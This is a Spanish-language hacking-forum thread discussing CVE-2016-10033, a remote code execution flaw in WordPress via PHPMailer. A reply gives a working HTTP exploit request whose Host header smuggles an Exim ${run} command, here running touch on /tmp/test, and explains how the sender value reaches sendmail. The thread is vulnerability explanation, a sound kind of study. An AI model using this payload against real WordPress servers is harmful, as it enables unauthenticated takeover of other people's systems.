elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: [Aporte] Mejores practicas en Java


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution  (Leído 754 veces)
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.025


Diviértete crackeando, que para eso estamos!


Ver Perfil
CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution
« en: 4 Mayo 2017, 00:42 »

Dawid Golunski (@dawid_golunski) explica cómo explotar la última vulnerabilidad que ha encontrado en Wordpress (la vulnerabilidad está en PHPMailer).

Usa técnicas nuevas para la explotación, por lo cual es muy recomendable de leer.

El post: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: CVE-2016-10033 WordPress Core - Ejecucion de codigo
« Respuesta #1 en: 6 Junio 2017, 02:30 »

El resumen es que si envias esta peticion:
Código:
POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}  tmp2)
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ejecutas /usr/bin/touch en /tmp/test, el bug es que el codigo de wordpress usa:
Código
  1. $phpmailer->setFrom( $from_email, $from_name );

Y como es implementado, ese comando se convierte en:
Código
  1. /usr/sbin/sendmail -t -i -fREMITENTE

Donde REMITENTE proviene del valor del valor de la cabecera Host, como nosotros controlamos la cabezera Host, solo debemos poner algo ahi y podemos controlar que escriba cualquier cosa.

La vulnerabilidad despues se convierte en ejecucion de codigo por medio de EXIM MTA http://www.exim.org/ , que es el servidor de correo instalado por default en Debian y Ubuntu.

Este tiene una opcion que se llama "Expansion Testing Mode", o modo de expansión de prueba, que puede ser usado para que EXIM lea y ejecute comandos en un lenguage propietario. Uno de los comandos es run.

Cuando haces:
Código:
${run{/bin/true}{yes}{no}}

Ejecuta /bin/true.. Facil

El motivo por el cual el exploit es mas complicado es porque la cabecera de Host no permite diagonales ni espacios, por lo que Dawid uso diagnoales y espacios en otras variables disponibles en el ambiente de EXIM.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Exploir javascript Remote Code Execution
Bugs y Exploits
.kike. 5 2,736 Último mensaje 26 Octubre 2006, 19:05
por .kike.
Remote code execution en ipw2200
Bugs y Exploits
w1r3d 2 1,796 Último mensaje 20 Enero 2007, 00:59
por sirdarckcat
Windows nslookup.exe Remote Code Execution Vulnerability!
Hacking Avanzado
toxeek 2 3,281 Último mensaje 17 Agosto 2008, 04:46
por toxeek
hola pidgin msn -- remote code execution exploit
Dudas Generales
UB40 4 1,434 Último mensaje 4 Octubre 2009, 03:36
por UB40
Duda con: IE winhlp32.exe msgbox() remote code execution
Bugs y Exploits
madridserginho 1 2,021 Último mensaje 8 Marzo 2010, 00:11
por AlbertoBSD
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines